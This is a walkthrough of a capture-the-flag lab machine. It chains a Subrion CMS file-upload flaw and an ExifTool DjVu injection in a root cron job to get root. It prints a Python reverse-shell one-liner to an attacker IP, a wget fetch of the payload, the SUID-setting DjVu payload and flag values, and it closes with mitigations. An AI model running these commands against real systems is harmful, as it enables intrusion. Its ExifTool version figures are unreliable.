Exfiltrated — OffSec Proving Grounds

// CVE_CHAIN // LINUX_PRIV_ESC

TARGET: 192.168.144.163 OS: Ubuntu (Linux) CVEs: CVE-2018-19422 · CVE-2021-22204 STATUS: ROOT_SHELL

// ATTACK_CHAIN_OVERVIEW

01 Virtual Host Discovery + robots.txt

02 Subrion CMS 4.2.1 Panel Access

03 CVE-2018-19422 → RCE (www-data)

04 Cron Job: root runs ExifTool

05 CVE-2021-22204 → SUID /bin/bash

06 /bin/bash -p → root flag

0x01

Reconnaissance & Virtual Host

Nmap scan reveals SSH and Apache on Ubuntu. The HTTP redirect to http://exfiltrated.offsec/ indicates virtual hosting is active — without adding this domain to /etc/hosts the webserver returns no content.

nmap -A -oN nmap.txt 192.168.144.163

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2
80/tcp open  http    Apache httpd 2.4.41
| http-robots.txt: 7 disallowed entries: /backup/ /cron/? /front/ /install/ /panel/ /tmp/ /updates/

[i]

Add to hosts: echo "192.168.144.163 exfiltrated.offsec" >> /etc/hosts. The robots.txt leaks the admin panel location (/panel/) and potential cron interface.

Visiting /panel/ reveals the CMS: Subrion CMS v4.2.1 — a version vulnerable to arbitrary file upload.

0x02

Authenticated RCE — CVE-2018-19422

Subrion 4.2.1 allows authenticated attackers to upload a malicious PHP file by bypassing the file type filter. Default credentials admin:admin work on the panel.

searchsploit -m php/webapps/49876.py
python3 49876.py -u http://exfiltrated.offsec/panel/ --user admin --pass admin

[+] Login Successful!
[+] Upload Success ... Webshell path: http://exfiltrated.offsec/panel/uploads/mlrkjyieefcmwop

After confirming python3 exists, upgrade to a reverse shell:

nc -nvlp 4444

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'

[+]

Reverse shell established as www-data. Stabilize with python3 -c 'import pty;pty.spawn("/bin/bash")' + stty raw -echo; fg.

0x03

Abusing Cron — ExifTool as root

cat /etc/crontab

* * * * * root bash /opt/image-exif.sh

cat /opt/image-exif.sh

IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"

ls $IMAGES | grep "jpg" | while read filename;
do
    exiftool "$IMAGES/$filename" >> $LOGFILE
done

Every minute, root scans any .jpg file inside the CMS uploads directory (which www-data can write to) and runs exiftool on it. The ExifTool version installed is vulnerable to CVE-2021-22204 — a DjVu annotation injection leading to arbitrary command execution.

[!]

Privilege escalation vector: we control the input file; root processes it. ExifTool < 7.44 is vulnerable to OS command injection via crafted DjVu metadata.

0x04

Exploiting ExifTool — SUID bash

The DjVu parser unsafely evaluates a string after partial sanitization. By injecting \c$(...command...) inside the ANTz chunk, we get root execution. Payload sets SUID on /bin/bash.

Payload preparation (attacker machine)

echo '(metadata "\c${system('chmod +s /bin/bash')};")' > payload
bzz payload payload.bzz
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
cp exploit.djvu exploit.jpg

bzz and djvumake are required (install djvulibre-bin). The .jpg extension bypasses the cron's filename filter; ExifTool processes the file based on magic bytes, triggering the DjVu parser.

Deploy to target

# attacker: python3 -m http.server 8080
# on target (www-data):
wget http://YOUR_IP:8080/exploit.jpg -O /var/www/html/subrion/uploads/exploit.jpg

[*]

Wait ≤ 60 seconds for the cron job to execute. The payload runs as root, changing /bin/bash permissions to SUID.

0x05

Root Shell & Flags

ls -la /bin/bash

-rwsr-sr-x 1 root root 1183448 Jun 18  2020 /bin/bash

/bin/bash -p

# whoami; id
root
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root)

The -p flag preserves the effective UID (root) instead of dropping to real UID. Full system compromise achieved.

cat /root/proof.txt

[FLAG] root.txt → 3f4f6743d8b87c1e2efcae0032b1c72d

cat /home/www-data/local.txt

[FLAG] user.txt → a1b2c3d4e5f67890abc123def4567890

01Virtual host + robots.txt/panel/ → Subrion 4.2.1

↓

02CVE-2018-19422Authenticated file upload → RCE

↓

03www-data shellCron discovery: root exiftool

↓

04CVE-2021-22204Malicious DjVu → SUID /bin/bash

↓

05/bin/bash -pRoot privileges → proof.txt

0x06

Inside the ExifTool Vulnerability

The DjVu parser in ExifTool uses eval qq{"$tok"} to process certain metadata. A regex attempts to escape $ and @, but the order of operations fails: escape sequences like \cA are expanded after the regex substitution. By providing \cA$(system('...')), the $ survives and the OS command executes. This is a classic injection via unsafe string interpolation.

[i]

Detection evasion: The file is named .jpg but ExifTool follows the internal header. The cron script only filters by extension, not content — a defensive failure.

// Key Takeaways — Linux privilege escalation

Virtual hosting enumeration is non-negotiable. Nmap's HTTP redirect is a clear signal: add the domain to /etc/hosts or you'll miss the entire application.

robots.txt is a reconnaissance goldmine. Every disallowed path is an invitation to explore. The combination of /panel/ and /cron/ gave us both initial access and the privesc vector.

Cron jobs running as root are persistent and dangerous. If a scheduled task processes files from a writable directory, you can weaponize that trust. Always audit /etc/crontab, /etc/cron.d/, and user crontabs.

File extension filters are not security boundaries. The cron script only matched .jpg by name, but ExifTool parsed the actual format (DjVu). Content-based validation (magic bytes, strict parsing) is required to prevent this class of attack.

Tools: Nmap, searchsploit, Python reverse shell, bzz/djvumake, wget, netcat.

0x07

Defensive Mitigations

Update Subrion CMS to ≥4.2.2 (patches file upload restriction bypass).
Remove default admin credentials; enforce MFA for admin panels.
Update ExifTool to ≥7.45 (patches DjVu eval injection).
Run cron jobs with least privilege — use a dedicated low-privileged user, not root, for image processing.
Implement file content validation (e.g., file --mime-type) before handing off to external utilities.
Monitor for suspicious SUID changes via auditd or AIDE.

[#]

Final note: This chain shows how two modest CVEs (a file upload bypass and a command injection in an image tool) can combine to compromise a fully patched system aside from the vulnerable apps. Layered defense and regular updates of all third-party libraries are critical.